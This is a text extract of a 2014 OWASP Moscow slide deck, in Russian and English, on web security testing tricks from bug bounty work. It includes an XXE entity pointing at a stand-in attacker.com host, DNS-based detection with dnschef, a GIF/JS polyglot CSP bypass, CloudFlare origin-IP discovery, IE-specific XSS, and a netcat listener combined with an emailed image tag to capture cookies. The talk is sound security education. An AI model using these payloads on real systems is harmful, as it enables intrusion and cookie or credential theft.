Upload
owasp-russia
View
680
Download
1
Embed Size (px)
Citation preview
Трюки при анализе защищенности веб-приложений - продвинутая версия
Сергей Белов
Digital Security
OWASP Moscow, 6 Dec 2014
Work/Activity BugHuting Speaker
Hey
2
XXE/SSRF detection via DNS
XXE/SSRF detection via DNS
SSRF:
1) Предложить сайт
<ссылка на сайт>
2) Бот проверяет сайт
3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)
XXE/SSRF detection via DNS
XXE:
1) XML
<?xml version="1.0" encoding="ISO-8859-1"?>
2) С сущностью
<!ENTITY xxe SYSTEM «http://attacker.com» >]>
3) Парсер пытается подгрузить сущность с внешнего сайта
XXE/SSRF detection via DNS
Сложности при поиске:
1) Есть или нет?
2) Время запроса
3) Firewall
4) Другие ограничения
XXE/SSRF detection via DNS
DNS leak
DNS server
XXE/SSRF detection via DNS
В ссылке есть домен
->
должен быть resolve домена
XXE/SSRF detection via DNS
Инструкция
1) Свой сервер (VPS) – 12.34.56.78
1) Ставим attacker.com свои NS сервера
NS1: 12.34.56.78; NS2: 12.34.56.78
2) dnschef
3) python dnschef.py -i 0.0.0.0
XXE/SSRF detection via DNS
Реальный пример
Говорят – переходит по ссылкам в чате...
XXE/SSRF detection via DNS
Сценарий 1
1) User 1 -> User 2 http://skype-example.com
2) # cat access.log | grep “skype-example” | wc –l
3) 0
XXE/SSRF detection via DNS
Сценарий 2 – DNS
Поймали :]
CSP bypass – js as image
CSP bypass – js as image
CSP bypass – js as image
Картинка == js файл Gif injector - http://pastebin.com/6yUbfGX5
CSP bypass – js as image
1) Возможность загружать файлы на разрешенные домены в CSP
2) Загрузить картинку<->js и сделать инклуд
<script src=“.../image.gif”></script>
Свежие хромы научились блочить подобное
CloudFlare – real IP detection
CloudFlare – real IP detection
CloudFlare – real IP detection
CloudFlare – real IP detection
CloudFlare Free, Pro and Business plan:
We do not proxy wildcard records
CloudFlare Enterprise:
For CloudFlare Enterprise customers, we do proxy wildcard records
CloudFlare – real IP detection
ping randoOm.victim.com => REAL IP
XSS && urlencode
XSS & urlencode
Web Server ?xss=<script>alert(1)</script>
XSS & urlencode
1) Не все web серверы выполняют urldecode
2) XSS подставляется, но после urlencode
3) XSS не выполняется
4) На помощь приходит... IE!
XSS & urlencode
Только после знака вопроса
XSS & urlencode
А если...
http://domain.com/path/<xss_here>/etc/
XSS & urlencode
http://domain.com/path/<xss>/etc/
IE Only (v11 inc):
header("Location: http://domain.com/path/<xss>/etc/");
XSS & urlencode
SQLmap
SQLmap
SQLmap
-u http://vuln.com/vote.php
--data="id=1&hash=2“
--eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"
Сложных ситуации - bugbounty
Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?
Situation #1 – Same Site Scripting
Situation #1 – Same Site Scripting
External IP – 12.34.56.78 Loopback – 127.0.0.1
Situation #1 – Same Site Scripting
Attacker: 1) nc –lv 10024 2) email to [email protected] with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)
Situation #1 – Same Site Scripting
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml
Situation #1 – Same Site Scripting
38
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
Situation #1 – Same Site Scripting
39
https://hackerone.com/reports/1509 - $100
Situation #2 – Self XSS
Situation #2 – Self XSS
XSS only for you – no impact?
Situation #2 – Self XSS
Situation #2 – Self XSS
Requirements: 1)CSRF for logout O_o 2)CSRF for login o_O
Situation #2 – Self XSS
Steps:
1) Save (self)XSS for you 2) Logout victim 3) Login victim w/ your creds 4) Draw window
5) Catch user’s creds!
Situation #2 – Self XSS
Google and self-XSS
Situation #2 – Self XSS
Share account and attack your victim
Situation #3 – evil HTTP referers
Situation #3 - HTTP referer
<a href=“http://external.com”>Go!</a> In request headers: ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?
Situation #3 - HTTP referer http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose-password.jpg>
... Owner of
comics-are-awesome.com know all _SECRET_ tokens (from referer)!
Situation #3 - HTTP referer
https://hackerone.com/reports/738 - $100
Situation #5 - Content-Security-Policy
Situation #5 - Content-Security-Policy
Situation #5 - Content-Security-Policy
CSP only for some browsers! Is it ok?
Situation #5 - Content-Security-Policy
1) Forks with diff UA 2) Proxy cache 3) Load balancer...
Bug hunter got $100, but...
Situation #5 - Content-Security-Policy
Fail! Why: • ‘Partial support in Internet Explorer 10-11 refers to the
browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header.
• Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages.
• Chrome for iOS fails to render pages without a connect-src 'self' policy.
• Old FF problems (some versions between XX and YY)
Situation #6 - Usernames
Situation #6 - Usernames
Okay! Let’s register: http://website.com/robots.txt
http://website.com/sitemap.xml ...
Situations XXX
Situations XXX
• Info disclose via CSS files (full path disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss (bug #2221)
• SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true
Thanks! Questions?
@sergeybelove